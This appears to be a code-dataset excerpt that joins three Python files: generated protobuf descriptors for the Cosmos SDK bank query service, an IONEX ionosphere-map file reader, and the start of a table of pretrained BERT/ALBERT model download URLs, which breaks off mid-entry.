serialized_options=b'\310\336\037\000\252\337\037(github.com/cosmos/cosmos-sdk/types.Coins', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryAllBalancesResponse.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=544,
serialized_end=726,
)
_QUERYTOTALSUPPLYREQUEST = _descriptor.Descriptor(
name='QueryTotalSupplyRequest',
full_name='cosmos.bank.v1beta1.QueryTotalSupplyRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryTotalSupplyRequest.pagination', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'\350\240\037\000\210\240\037\000',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=728,
serialized_end=823,
)
_QUERYTOTALSUPPLYRESPONSE = _descriptor.Descriptor(
name='QueryTotalSupplyResponse',
full_name='cosmos.bank.v1beta1.QueryTotalSupplyResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='supply', full_name='cosmos.bank.v1beta1.QueryTotalSupplyResponse.supply', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000\252\337\037(github.com/cosmos/cosmos-sdk/types.Coins', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryTotalSupplyResponse.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=826,
serialized_end=1006,
)
_QUERYSUPPLYOFREQUEST = _descriptor.Descriptor(
name='QuerySupplyOfRequest',
full_name='cosmos.bank.v1beta1.QuerySupplyOfRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='denom', full_name='cosmos.bank.v1beta1.QuerySupplyOfRequest.denom', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1008,
serialized_end=1045,
)
_QUERYSUPPLYOFRESPONSE = _descriptor.Descriptor(
name='QuerySupplyOfResponse',
full_name='cosmos.bank.v1beta1.QuerySupplyOfResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='amount', full_name='cosmos.bank.v1beta1.QuerySupplyOfResponse.amount', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1047,
serialized_end=1119,
)
_QUERYPARAMSREQUEST = _descriptor.Descriptor(
name='QueryParamsRequest',
full_name='cosmos.bank.v1beta1.QueryParamsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1121,
serialized_end=1141,
)
_QUERYPARAMSRESPONSE = _descriptor.Descriptor(
name='QueryParamsResponse',
full_name='cosmos.bank.v1beta1.QueryParamsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='params', full_name='cosmos.bank.v1beta1.QueryParamsResponse.params', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1143,
serialized_end=1215,
)
_QUERYDENOMSMETADATAREQUEST = _descriptor.Descriptor(
name='QueryDenomsMetadataRequest',
full_name='cosmos.bank.v1beta1.QueryDenomsMetadataRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryDenomsMetadataRequest.pagination', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1217,
serialized_end=1305,
)
_QUERYDENOMSMETADATARESPONSE = _descriptor.Descriptor(
name='QueryDenomsMetadataResponse',
full_name='cosmos.bank.v1beta1.QueryDenomsMetadataResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadatas', full_name='cosmos.bank.v1beta1.QueryDenomsMetadataResponse.metadatas', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryDenomsMetadataResponse.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1308,
serialized_end=1454,
)
_QUERYDENOMMETADATAREQUEST = _descriptor.Descriptor(
name='QueryDenomMetadataRequest',
full_name='cosmos.bank.v1beta1.QueryDenomMetadataRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='denom', full_name='cosmos.bank.v1beta1.QueryDenomMetadataRequest.denom', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1456,
serialized_end=1498,
)
_QUERYDENOMMETADATARESPONSE = _descriptor.Descriptor(
name='QueryDenomMetadataResponse',
full_name='cosmos.bank.v1beta1.QueryDenomMetadataResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='cosmos.bank.v1beta1.QueryDenomMetadataResponse.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1500,
serialized_end=1583,
)
_QUERYDENOMOWNERSREQUEST = _descriptor.Descriptor(
name='QueryDenomOwnersRequest',
full_name='cosmos.bank.v1beta1.QueryDenomOwnersRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='denom', full_name='cosmos.bank.v1beta1.QueryDenomOwnersRequest.denom', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryDenomOwnersRequest.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1585,
serialized_end=1685,
)
_DENOMOWNER = _descriptor.Descriptor(
name='DenomOwner',
full_name='cosmos.bank.v1beta1.DenomOwner',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='address', full_name='cosmos.bank.v1beta1.DenomOwner.address', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\322\264-\024cosmos.AddressString', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='balance', full_name='cosmos.bank.v1beta1.DenomOwner.balance', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1687,
serialized_end=1792,
)
_QUERYDENOMOWNERSRESPONSE = _descriptor.Descriptor(
name='QueryDenomOwnersResponse',
full_name='cosmos.bank.v1beta1.QueryDenomOwnersResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='denom_owners', full_name='cosmos.bank.v1beta1.QueryDenomOwnersResponse.denom_owners', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryDenomOwnersResponse.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1795,
serialized_end=1937,
)
_QUERYBALANCERESPONSE.fields_by_name['balance'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYALLBALANCESREQUEST.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGEREQUEST
_QUERYALLBALANCESRESPONSE.fields_by_name['balances'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYALLBALANCESRESPONSE.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGERESPONSE
_QUERYTOTALSUPPLYREQUEST.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGEREQUEST
_QUERYTOTALSUPPLYRESPONSE.fields_by_name['supply'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYTOTALSUPPLYRESPONSE.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGERESPONSE
_QUERYSUPPLYOFRESPONSE.fields_by_name['amount'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYPARAMSRESPONSE.fields_by_name['params'].message_type = cosmos_dot_bank_dot_v1beta1_dot_bank__pb2._PARAMS
_QUERYDENOMSMETADATAREQUEST.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGEREQUEST
_QUERYDENOMSMETADATARESPONSE.fields_by_name['metadatas'].message_type = cosmos_dot_bank_dot_v1beta1_dot_bank__pb2._METADATA
_QUERYDENOMSMETADATARESPONSE.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGERESPONSE
_QUERYDENOMMETADATARESPONSE.fields_by_name['metadata'].message_type = cosmos_dot_bank_dot_v1beta1_dot_bank__pb2._METADATA
_QUERYDENOMOWNERSREQUEST.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGEREQUEST
_DENOMOWNER.fields_by_name['balance'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYDENOMOWNERSRESPONSE.fields_by_name['denom_owners'].message_type = _DENOMOWNER
_QUERYDENOMOWNERSRESPONSE.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGERESPONSE
DESCRIPTOR.message_types_by_name['QueryBalanceRequest'] = _QUERYBALANCEREQUEST
DESCRIPTOR.message_types_by_name['QueryBalanceResponse'] = _QUERYBALANCERESPONSE
DESCRIPTOR.message_types_by_name['QueryAllBalancesRequest'] = _QUERYALLBALANCESREQUEST
DESCRIPTOR.message_types_by_name['QueryAllBalancesResponse'] = _QUERYALLBALANCESRESPONSE
DESCRIPTOR.message_types_by_name['QueryTotalSupplyRequest'] = _QUERYTOTALSUPPLYREQUEST
DESCRIPTOR.message_types_by_name['QueryTotalSupplyResponse'] = _QUERYTOTALSUPPLYRESPONSE
DESCRIPTOR.message_types_by_name['QuerySupplyOfRequest'] = _QUERYSUPPLYOFREQUEST
DESCRIPTOR.message_types_by_name['QuerySupplyOfResponse'] = _QUERYSUPPLYOFRESPONSE
DESCRIPTOR.message_types_by_name['QueryParamsRequest'] = _QUERYPARAMSREQUEST
DESCRIPTOR.message_types_by_name['QueryParamsResponse'] = _QUERYPARAMSRESPONSE
DESCRIPTOR.message_types_by_name['QueryDenomsMetadataRequest'] = _QUERYDENOMSMETADATAREQUEST
DESCRIPTOR.message_types_by_name['QueryDenomsMetadataResponse'] = _QUERYDENOMSMETADATARESPONSE
DESCRIPTOR.message_types_by_name['QueryDenomMetadataRequest'] = _QUERYDENOMMETADATAREQUEST
DESCRIPTOR.message_types_by_name['QueryDenomMetadataResponse'] = _QUERYDENOMMETADATARESPONSE
DESCRIPTOR.message_types_by_name['QueryDenomOwnersRequest'] = _QUERYDENOMOWNERSREQUEST
DESCRIPTOR.message_types_by_name['DenomOwner'] = _DENOMOWNER
DESCRIPTOR.message_types_by_name['QueryDenomOwnersResponse'] = _QUERYDENOMOWNERSRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
QueryBalanceRequest = _reflection.GeneratedProtocolMessageType('QueryBalanceRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYBALANCEREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryBalanceRequest)
})
_sym_db.RegisterMessage(QueryBalanceRequest)
QueryBalanceResponse = _reflection.GeneratedProtocolMessageType('QueryBalanceResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYBALANCERESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryBalanceResponse)
})
_sym_db.RegisterMessage(QueryBalanceResponse)
QueryAllBalancesRequest = _reflection.GeneratedProtocolMessageType('QueryAllBalancesRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYALLBALANCESREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryAllBalancesRequest)
})
_sym_db.RegisterMessage(QueryAllBalancesRequest)
QueryAllBalancesResponse = _reflection.GeneratedProtocolMessageType('QueryAllBalancesResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYALLBALANCESRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryAllBalancesResponse)
})
_sym_db.RegisterMessage(QueryAllBalancesResponse)
QueryTotalSupplyRequest = _reflection.GeneratedProtocolMessageType('QueryTotalSupplyRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYTOTALSUPPLYREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryTotalSupplyRequest)
})
_sym_db.RegisterMessage(QueryTotalSupplyRequest)
QueryTotalSupplyResponse = _reflection.GeneratedProtocolMessageType('QueryTotalSupplyResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYTOTALSUPPLYRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryTotalSupplyResponse)
})
_sym_db.RegisterMessage(QueryTotalSupplyResponse)
QuerySupplyOfRequest = _reflection.GeneratedProtocolMessageType('QuerySupplyOfRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYSUPPLYOFREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QuerySupplyOfRequest)
})
_sym_db.RegisterMessage(QuerySupplyOfRequest)
QuerySupplyOfResponse = _reflection.GeneratedProtocolMessageType('QuerySupplyOfResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYSUPPLYOFRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QuerySupplyOfResponse)
})
_sym_db.RegisterMessage(QuerySupplyOfResponse)
QueryParamsRequest = _reflection.GeneratedProtocolMessageType('QueryParamsRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYPARAMSREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryParamsRequest)
})
_sym_db.RegisterMessage(QueryParamsRequest)
QueryParamsResponse = _reflection.GeneratedProtocolMessageType('QueryParamsResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYPARAMSRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryParamsResponse)
})
_sym_db.RegisterMessage(QueryParamsResponse)
QueryDenomsMetadataRequest = _reflection.GeneratedProtocolMessageType('QueryDenomsMetadataRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMSMETADATAREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomsMetadataRequest)
})
_sym_db.RegisterMessage(QueryDenomsMetadataRequest)
QueryDenomsMetadataResponse = _reflection.GeneratedProtocolMessageType('QueryDenomsMetadataResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMSMETADATARESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomsMetadataResponse)
})
_sym_db.RegisterMessage(QueryDenomsMetadataResponse)
QueryDenomMetadataRequest = _reflection.GeneratedProtocolMessageType('QueryDenomMetadataRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMMETADATAREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomMetadataRequest)
})
_sym_db.RegisterMessage(QueryDenomMetadataRequest)
QueryDenomMetadataResponse = _reflection.GeneratedProtocolMessageType('QueryDenomMetadataResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMMETADATARESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomMetadataResponse)
})
_sym_db.RegisterMessage(QueryDenomMetadataResponse)
QueryDenomOwnersRequest = _reflection.GeneratedProtocolMessageType('QueryDenomOwnersRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMOWNERSREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomOwnersRequest)
})
_sym_db.RegisterMessage(QueryDenomOwnersRequest)
DenomOwner = _reflection.GeneratedProtocolMessageType('DenomOwner', (_message.Message,), {
'DESCRIPTOR' : _DENOMOWNER,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.DenomOwner)
})
_sym_db.RegisterMessage(DenomOwner)
QueryDenomOwnersResponse = _reflection.GeneratedProtocolMessageType('QueryDenomOwnersResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMOWNERSRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomOwnersResponse)
})
_sym_db.RegisterMessage(QueryDenomOwnersResponse)
DESCRIPTOR._options = None
_QUERYBALANCEREQUEST.fields_by_name['address']._options = None
_QUERYBALANCEREQUEST._options = None
_QUERYALLBALANCESREQUEST.fields_by_name['address']._options = None
_QUERYALLBALANCESREQUEST._options = None
_QUERYALLBALANCESRESPONSE.fields_by_name['balances']._options = None
_QUERYTOTALSUPPLYREQUEST._options = None
_QUERYTOTALSUPPLYRESPONSE.fields_by_name['supply']._options = None
_QUERYSUPPLYOFRESPONSE.fields_by_name['amount']._options = None
_QUERYPARAMSRESPONSE.fields_by_name['params']._options = None
_QUERYDENOMSMETADATARESPONSE.fields_by_name['metadatas']._options = None
_QUERYDENOMMETADATARESPONSE.fields_by_name['metadata']._options = None
_DENOMOWNER.fields_by_name['address']._options = None
_DENOMOWNER.fields_by_name['balance']._options = None
_QUERY = _descriptor.ServiceDescriptor(
name='Query',
full_name='cosmos.bank.v1beta1.Query',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=1940,
serialized_end=3175,
methods=[
_descriptor.MethodDescriptor(
name='Balance',
full_name='cosmos.bank.v1beta1.Query.Balance',
index=0,
containing_service=None,
input_type=_QUERYBALANCEREQUEST,
output_type=_QUERYBALANCERESPONSE,
serialized_options=b'\202\323\344\223\0022\0220/cosmos/bank/v1beta1/balances/{address}/by_denom',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='AllBalances',
full_name='cosmos.bank.v1beta1.Query.AllBalances',
index=1,
containing_service=None,
input_type=_QUERYALLBALANCESREQUEST,
output_type=_QUERYALLBALANCESRESPONSE,
serialized_options=b'\202\323\344\223\002)\022\'/cosmos/bank/v1beta1/balances/{address}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='TotalSupply',
full_name='cosmos.bank.v1beta1.Query.TotalSupply',
index=2,
containing_service=None,
input_type=_QUERYTOTALSUPPLYREQUEST,
output_type=_QUERYTOTALSUPPLYRESPONSE,
serialized_options=b'\202\323\344\223\002\035\022\033/cosmos/bank/v1beta1/supply',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='SupplyOf',
full_name='cosmos.bank.v1beta1.Query.SupplyOf',
index=3,
containing_service=None,
input_type=_QUERYSUPPLYOFREQUEST,
output_type=_QUERYSUPPLYOFRESPONSE,
serialized_options=b'\202\323\344\223\002%\022#/cosmos/bank/v1beta1/supply/{denom}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='Params',
full_name='cosmos.bank.v1beta1.Query.Params',
index=4,
containing_service=None,
input_type=_QUERYPARAMSREQUEST,
output_type=_QUERYPARAMSRESPONSE,
serialized_options=b'\202\323\344\223\002\035\022\033/cosmos/bank/v1beta1/params',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DenomMetadata',
full_name='cosmos.bank.v1beta1.Query.DenomMetadata',
index=5,
containing_service=None,
input_type=_QUERYDENOMMETADATAREQUEST,
output_type=_QUERYDENOMMETADATARESPONSE,
serialized_options=b'\202\323\344\223\002.\022,/cosmos/bank/v1beta1/denoms_metadata/{denom}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DenomsMetadata',
full_name='cosmos.bank.v1beta1.Query.DenomsMetadata',
index=6,
containing_service=None,
input_type=_QUERYDENOMSMETADATAREQUEST,
output_type=_QUERYDENOMSMETADATARESPONSE,
serialized_options=b'\202\323\344\223\002&\022$/cosmos/bank/v1beta1/denoms_metadata',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DenomOwners',
full_name='cosmos.bank.v1beta1.Query.DenomOwners',
index=7,
containing_service=None,
input_type=_QUERYDENOMOWNERSREQUEST,
output_type=_QUERYDENOMOWNERSRESPONSE,
serialized_options=b'\202\323\344\223\002+\022)/cosmos/bank/v1beta1/denom_owners/{denom}',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_QUERY)
DESCRIPTOR.services_by_name['Query'] = _QUERY
# @@protoc_insertion_point(module_scope)
|
py | b414ecf1a81d724d201e7aad4edbed452acf1e85 | from .ionex_file import IonexV1, NullContext
from .exceptions import IONEXError
from .exceptions import IONEXUnexpectedEnd
__all__ = ['reader']
def _get_version_type(line):
return float(line[:8]), line[20]
def reader(file):
"""Returns the file reader in IONEX format.
The reader is an iterable object, at each iteration it returns an instance
`` ionex_map.IonexMap`` next map read from file.
: type file: str | file-object
: param file: Path to the IONEX file or file object.
: raises IONEXError:
If the type or version of the uploaded file is unknown.
: raises IONEXUnexpectedEnd:
Incomplete file.
: raises IONEXMapError:
If there are errors while processing the card.
"""
readers = {
1.0: IonexV1,
}
if isinstance(file, str):
context_manager = open(file)
else:
context_manager = NullContext(file)
with context_manager as file_object:
try:
file_ver, file_type = _get_version_type(next(file_object))
except StopIteration:
raise IONEXUnexpectedEnd(file_object)
if file_type != 'I':
raise IONEXError('Unknown file type.')
if file_ver not in readers:
raise IONEXError('Unsupported version: {}'.format(file_ver))
reader_class = readers[file_ver]
return reader_class(file)
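# --- Usage sketch (illustrative addition, not part of the original module) ---
# A minimal example of how the reader is meant to be used. The file name
# 'codg0010.18i' is a hypothetical local IONEX file; each iteration yields the
# next map object parsed from it, as described in the docstring above.
if __name__ == '__main__':
    maps = list(reader('codg0010.18i'))
    print('Read {} maps from file'.format(len(maps)))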
|
py | b414eef3d1fbf80a2a42dd40414bc4663437d495 | #!/usr/bin/python3
"""
@Author: Liu Shaoweihua
@Site: https://github.com/liushaoweihua
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
pretrained_urls = {
'bert_zh':
'https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip',
'bert_wwm_ext_zh':
'https://storage.googleapis.com/chineseglue/pretrain_models/chinese_wwm_ext_L-12_H-768_A-12.zip',
'albert_xlarge_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_xlarge_zh_177k.zip',
'albert_large_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_large_zh.zip',
'albert_base_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_base_zh.zip',
'albert_base_ext_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_base_zh_additional_36k_steps.zip',
'albert_small_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_small_zh_google.zip',
'albert_tiny_zh_brightmart':
'https://storage.googleapis.com/albert_zh/albert_tiny_zh_google.zip',
'roberta_zh_brightmart':
